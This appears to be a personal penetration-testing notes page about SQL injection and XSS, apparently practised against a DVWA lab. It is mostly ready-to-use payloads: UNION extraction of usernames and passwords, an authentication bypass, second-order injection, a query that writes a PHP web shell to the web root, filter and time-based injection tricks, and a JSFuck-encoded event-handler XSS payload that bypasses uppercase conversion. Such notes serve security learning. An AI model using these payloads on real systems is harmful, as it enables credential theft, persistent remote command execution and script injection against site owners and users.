SQL Injection & XSS Playground
This is my playground for SQL injection and XSS

mysql> select * from users where user_id = 1 order by 7;
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;

mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99'

mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');

mysql> select * from users where user_id = 1 union select all 1,2,3,4,"<?php system($_REQUEST['c']);?>",6 into outfile "/var/www/dvwa/shell.php" #;

mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));

mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;

mysql> select * from users where user_id = 1 or (select sleep(1)+1);
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);

Say we have the following PHP code that takes name as a user supplied parameter:
<?php
$input=$_GET['name'];
$sanitized=strtoupper(htmlspecialchars($input));
echo '<form action="">';
echo "First name: <input type='text' name='name' value='".$sanitized."'><br>";
echo "<input type='submit' value='Submit form'></form>";
echo "</HTML></body>";
?>
Line 3 is vulnerable to XSS, and we can break out of the input with a single quote ':
$sanitized=strtoupper(htmlspecialchars($input));
For example, if we set the name parameter to the value of a', we get:
Note that the a got converted to a capital A and this is due to the strtoupper function being called on our input. What this means is that any ascii letters in our JavaScript payload will get converted to uppercase and become invalid and will not execute (i.ealert() != ALERT()).
To bypass this constraint, we can encode our payload using JsFuck, which eliminates all the letters from the payload and leaves us with this:
A' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()'

MySQL SQL Injection Cheat Sheet
pentestmonkey
MSSQL Injection Cheat Sheet
pentestmonkey
Hacking website using SQL Injection -step by step guide
Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab
Copy link
On this page
Classic SQL Injection
Union Select Data Extraction
Authentication Bypass
Second Order Injection
Dropping a Backdoor
Conditional Select
Bypassing Whitespace Filtering
Time Based SQL Injection
Sleep Invokation
XSS
Strtoupper Bypass
References